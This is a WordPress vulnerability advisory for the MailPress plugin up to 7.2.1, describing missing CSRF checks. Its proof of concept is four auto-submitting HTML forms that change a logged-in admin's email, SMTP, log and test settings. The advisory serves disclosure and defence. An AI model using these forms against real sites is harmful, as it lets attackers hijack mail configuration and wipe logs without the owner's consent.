WordPress Plugin Vulnerabilities
MailPress <= 7.2.1 - Arbitrary Settings Update & Log Files Purge via CSRF
Description
The plugin does not have CSRF checks in various places, which could allow attackers to make a logged in admin change the settings, purge log files and more via CSRF attacks
Proof of Concept
<form id="test" action="https://example.com/wp-admin/options-general.php?page=mailpress_settings&tab=0" method="POST"> <input type="text" name="_tab" value="general"> <input type="text" name="general[fromemail]" value="[email protected]"> <input type="text" name="general[fromname]" value="hacked"> <input type="text" name="general[subscription_mngt]" value="ajax"> <input type="text" name="general[id]" value=""> <input type="text" name="general[map_provider]" value="o"> <input type="text" name="general[bmapkey]" value=""> <input type="text" name="general[gmapkey]" value=""> <input type="text" name="general[here_id]" value=""> <input type="text" name="general[here_code]" value=""> <input type="text" name="general[mapboxtoken]" value=""> <input type="text" name="Submit" value="Änderungen speichern"> </form> <script> document.getElementById("test").submit(); </script> <form id="test" action="https://example.com/wp-admin/options-general.php?page=mailpress_settings&tab=0" method="POST"> <input type="text" name="_tab" value="connection_smtp"> <input type="text" name="connection_smtp[server]" value="hacked"> <input type="text" name="connection_smtp[username]" value="hacked"> <input type="text" name="connection_smtp[password]" value="hacked"> <input type="text" name="connection_smtp[ssl]" value=""> <input type="text" name="connection_smtp[port]" value="25"> <input type="text" name="connection_smtp[customport]" value=""> <input type="text" name="connection_smtp[pophost]" value=""> <input type="text" name="connection_smtp[popport]" value=""> <input type="text" name="Submit" value="Änderungen speichern"> </form> <script> document.getElementById("test").submit(); </script> <form id="test" action="https://example.com/wp-admin/options-general.php?page=mailpress_settings&tab=0" method="POST"> <input type="text" name="_tab" value="logs"> <input type="text" name="logs[general][level]" value="123456789"> <input type="text" name="logs[general][lognbr]" value="1"> <input type="text" name="logs[general][lastpurge]" value="20220423"> <input type="text" name="Submit" value="Änderungen speichern"> </form> <script> document.getElementById("test").submit(); </script> <form id="test" action="https://example.com/wp-admin/options-general.php?page=mailpress_settings&tab=0" method="POST"> <input type="text" name="_tab" value="test"> <input type="text" name="test[toemail]" value="[email protected]"> <input type="text" name="test[toname]" value="hacked"> <input type="text" name="test[theme]" value="twentyten"> <input type="text" name="test[th][MailPress][tm]" value="0"> <input type="text" name="test[th][MailPress2020][tm]" value="0"> <input type="text" name="test[th][nogent94][tm]" value="0"> <input type="text" name="test[th][nohtml][tm]" value="0"> <input type="text" name="test[th][twentyeleven][tm]" value="0"> <input type="text" name="test[th][twentyten][tm]" value="0"> <input type="text" name="test[th][twentythirteen][tm]" value="0"> <input type="text" name="test[th][twentytwelve][tm]" value="0"> <input type="text" name="test[fakeit]" value="on"> <input type="text" name="Test" value="Save & Test"> </form> <script> document.getElementById("test").submit(); </script>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-31 (about 1 years ago)
Added
2022-05-31 (about 1 years ago)
Last Updated
2023-02-26 (about 9 months ago)